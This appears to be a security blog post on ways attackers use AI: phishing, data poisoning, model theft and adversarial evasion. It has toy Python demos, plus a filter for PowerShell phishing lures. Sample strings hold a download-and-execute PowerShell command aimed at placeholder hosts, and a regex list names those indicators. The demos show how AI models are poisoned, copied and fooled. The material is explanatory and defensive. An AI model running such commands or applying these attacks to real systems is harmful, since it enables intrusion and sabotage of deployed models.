Can AI be Used by Attackers?

Does the sun shine brightly? Yes.

Remember the old adage, everything we use can be used against us… so of course attackers will use AI.

So yes, AI (artificial intelligence) will be used by attackers to create better phishing campaigns and to translate messages from any language into another. For a start, we can assume misspelled words will no longer give away a well-run phishing campaign.

But that is only the ‘easy’ answer to how AI will be used.

So of course the smart thing to do is to ask an AI engine: “What are some ways AI can be used by attackers?”

Here are the answers:

  1. AI-Powered Phishing Attacks: Attackers use AI algorithms to craft highly convincing and personalized phishing emails. These AI-generated messages are more likely to trick even vigilant users due to their realistic content and proper grammar. The FBI has warned about the increasing threat of AI-driven phishing attacks that can tailor messages to specific recipients, making them more effective at data theft.

  2. Data Poisoning: This involves manipulating the training data of AI models to corrupt their learning process. Attackers can publish poisoned data on the internet, which may then be inadvertently used to train AI systems. This can lead to compromised AI models that behave in ways beneficial to the attacker. (A toy sketch of this appears after the list.)

  3. AI Model Theft: Cybercriminals attempt to reverse engineer or hijack AI models, especially those deployed on vulnerable hardware or accessible through public APIs. This allows them to potentially access sensitive data used in training or replicate the AI system for malicious purposes. (Also sketched after the list.)

  4. Evasion Attacks: These attacks involve altering input data to trick machine learning models. For example, attackers might subtly modify a stop sign’s appearance to make a self-driving car’s AI misinterpret it. This type of attack can have serious real-world consequences. (Sketched below as well.)
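
To make item 2 concrete, here is a minimal, self-contained sketch of the idea, assuming scikit-learn and NumPy are installed. The data is synthetic and the “attack” is a simple label flip rather than any specific real-world technique; the point is only that corrupted training labels quietly degrade the resulting model.

```python
# Toy illustration of data poisoning: flipping a fraction of training
# labels degrades a simple classifier. Synthetic data, illustrative only.
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)

# Two Gaussian clusters stand in for "clean" training data.
X = np.vstack([rng.normal(0, 1, (500, 2)), rng.normal(3, 1, (500, 2))])
y = np.array([0] * 500 + [1] * 500)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

def accuracy_with_poisoning(flip_fraction):
    """Train on labels where `flip_fraction` of them have been flipped."""
    y_poisoned = y_train.copy()
    n_flip = int(flip_fraction * len(y_poisoned))
    idx = rng.choice(len(y_poisoned), size=n_flip, replace=False)
    y_poisoned[idx] = 1 - y_poisoned[idx]        # the attacker's label flips
    model = LogisticRegression().fit(X_train, y_poisoned)
    return model.score(X_test, y_test)           # evaluated on clean labels

# As more of the training labels are poisoned, test accuracy falls off.
for frac in (0.0, 0.25, 0.5):
    print(f"label-flip fraction {frac:.0%}: "
          f"test accuracy {accuracy_with_poisoning(frac):.2f}")
```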
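
Item 3 can be sketched just as simply: query a model you can only reach through its predictions, record the answers, and train your own copy. In the toy example below, a locally trained model stands in for a victim’s public prediction API (the name `victim_api` is my own placeholder, not a real service), so this is a concept sketch rather than a working attack.

```python
# Toy illustration of model extraction ("model theft" via a prediction API).
# A local model stands in for the victim's public endpoint; illustrative only.
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(1)

# "Victim" model, trained on data the attacker never sees.
X_secret = rng.normal(0, 1, (2000, 4))
y_secret = (X_secret[:, 0] + X_secret[:, 1] > 0).astype(int)
victim = RandomForestClassifier(random_state=0).fit(X_secret, y_secret)

def victim_api(x):
    """Stand-in for a public prediction endpoint: inputs in, labels out."""
    return victim.predict(x)

# Attacker: send probe inputs, collect the API's answers, train a surrogate.
X_probe = rng.normal(0, 1, (2000, 4))
y_probe = victim_api(X_probe)
surrogate = LogisticRegression().fit(X_probe, y_probe)

# How often does the copy agree with the original on fresh inputs?
X_fresh = rng.normal(0, 1, (1000, 4))
agreement = (surrogate.predict(X_fresh) == victim_api(X_fresh)).mean()
print(f"surrogate agrees with victim on {agreement:.0%} of fresh inputs")
```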
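
And for item 4, an evasion (adversarial-example) attack comes down to nudging an input just far enough to cross the model’s decision boundary. The sketch below applies a gradient-sign style perturbation to a linear classifier on synthetic data; real attacks against image models work on the same principle with far smaller, less visible changes.

```python
# Toy illustration of an evasion attack: a small, targeted perturbation
# flips a linear classifier's decision. Synthetic data, illustrative only.
import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(2)

X = np.vstack([rng.normal(0, 1, (500, 2)), rng.normal(3, 1, (500, 2))])
y = np.array([0] * 500 + [1] * 500)
model = LogisticRegression().fit(X, y)

x = np.array([[2.0, 2.0]])                 # a point the model calls class 1
print("original prediction:", model.predict(x)[0])

# Move the input a small step against the model's weight vector
# (the gradient-sign direction for a linear model).
epsilon = 0.8
x_adv = x - epsilon * np.sign(model.coef_)
print("perturbed prediction:", model.predict(x_adv)[0])
print("perturbation size per feature:", epsilon)
```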

To mitigate these AI-based threats, organizations should:

  1. Implement robust data validation and cleaning processes to prevent data poisoning.
  2. Use secure environments for AI model training and deployment.
  3. Regularly update and patch AI systems to address known vulnerabilities.
  4. Employ AI-powered threat detection systems to identify anomalous behavior (see the sketch after this list).
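
Point 4 of that list can be as modest as an unsupervised anomaly detector watching behavioral features such as login rate and data volume. Here is a minimal sketch, assuming scikit-learn; the feature values are invented, and a production system would use real telemetry, careful tuning, and alert triage rather than a print statement.

```python
# Minimal sketch of AI-assisted threat detection: an IsolationForest flags
# behavior that looks unlike the baseline. Feature values are invented.
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(3)

# Baseline behavior: [logins_per_hour, mb_transferred, failed_logins]
baseline = np.column_stack([
    rng.poisson(4, 1000),          # typical login rate
    rng.normal(50, 10, 1000),      # typical data volume (MB)
    rng.poisson(1, 1000),          # occasional failed logins
])
detector = IsolationForest(random_state=0).fit(baseline)

# New observations: one normal, one that looks like credential stuffing
# plus bulk exfiltration.
new_events = np.array([
    [5, 48.0, 0],
    [40, 900.0, 25],
])
for event, verdict in zip(new_events, detector.predict(new_events)):
    label = "ANOMALY" if verdict == -1 else "normal"
    print(label, event)
```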

There are multiple types of evasion attacks:

Evasion attacks are a type of cyber attack in which the attacker attempts to bypass the security measures of a target system by manipulating or disguising the malicious traffic. These attacks can take various forms, including:

  1. Protocol evasion: The attacker manipulates the communication protocol to bypass security controls, such as firewalls or intrusion detection systems.
  2. Application-level evasion: The attacker modifies the payload of the attack to evade detection by security software, such as antivirus or intrusion prevention systems.
  3. Timing-based evasion: The attacker uses specific timing techniques to bypass security controls that rely on analyzing the time between packets or requests.
  4. Fragmentation-based evasion: The attacker splits the malicious traffic into smaller fragments, making it difficult for security systems to reassemble and detect the attack (a small illustration follows this list).
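
To see why item 4 works against naive inspection, here is a small, purely illustrative sketch – no real protocol handling, just byte strings – showing a signature that per-fragment scanning misses but reassembly-before-inspection catches.

```python
# Toy illustration of fragmentation-based evasion: a signature split across
# fragments is missed by per-fragment scanning but found after reassembly.
SIGNATURE = b"DownloadString"          # pattern an inspector looks for

payload = b"powershell IEX (New-Object Net.WebClient).DownloadString('http://x')"
fragments = [payload[i:i + 8] for i in range(0, len(payload), 8)]  # 8-byte chunks

def naive_per_fragment_scan(frags):
    """What a stateless inspector sees: each fragment on its own."""
    return any(SIGNATURE in frag for frag in frags)

def scan_after_reassembly(frags):
    """Reassemble first, then inspect -- the defensive approach."""
    return SIGNATURE in b"".join(frags)

print("per-fragment scan detects signature:", naive_per_fragment_scan(fragments))
print("scan after reassembly detects signature:", scan_after_reassembly(fragments))
```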

To defend against evasion attacks, organizations should implement a multi-layered security approach that includes continuous monitoring, threat intelligence, and regular security updates. Additionally, security professionals should stay up-to-date with the latest attack techniques and trends to better understand and mitigate potential threats.

So what can be done (besides the 4 steps above)?

We must stay ahead of the game by never ceasing to learn new methods and by learning how new tools are being used.

Contact us to discuss.  Buy the book I wrote.


One attack that has been discussed is a campaign where attackers use phishing to get PowerShell scripts to run via the OneDrive platform.

As you can see in the screenshot above from my phone, there is an article describing the OneDrive phishing scam, which attempts to trick users into running a PowerShell script – not a good idea. There are a couple of articles on it, including one from Hacker News. As usual, phishing is the number one attack vector.
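
On the defensive side, even a crude filter can flag messages that coax users into pasting commands into PowerShell. The sketch below is my own illustration – the indicator list and the sample message are invented, not taken from the actual campaign – but it shows the kind of check a mail gateway or help desk tool could run.

```python
# Crude, illustrative check for messages that coax users into running
# PowerShell. The indicator list and sample text are invented for the sketch.
import re

SUSPICIOUS_PATTERNS = [
    r"\bpowershell(\.exe)?\b",        # direct invocation
    r"-enc(odedcommand)?\b",          # encoded command switch
    r"\bIEX\b",                       # Invoke-Expression alias
    r"Invoke-Expression",
    r"DownloadString|DownloadFile",   # download-and-run helpers
]

def flag_powershell_lure(message: str) -> list[str]:
    """Return the indicators found in a message body, if any."""
    return [p for p in SUSPICIOUS_PATTERNS
            if re.search(p, message, flags=re.IGNORECASE)]

sample = ("To fix your OneDrive sync error, press Win+R, type powershell, "
          "and paste: IEX (New-Object Net.WebClient)"
          ".DownloadString('http://example.test/fix.ps1')")

hits = flag_powershell_lure(sample)
print("suspicious indicators:", hits if hits else "none")
```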


I could find other examples of AI-driven attacks, but attackers already share possible attacks among themselves as it is – no need to add to the volume. One example attack is enough.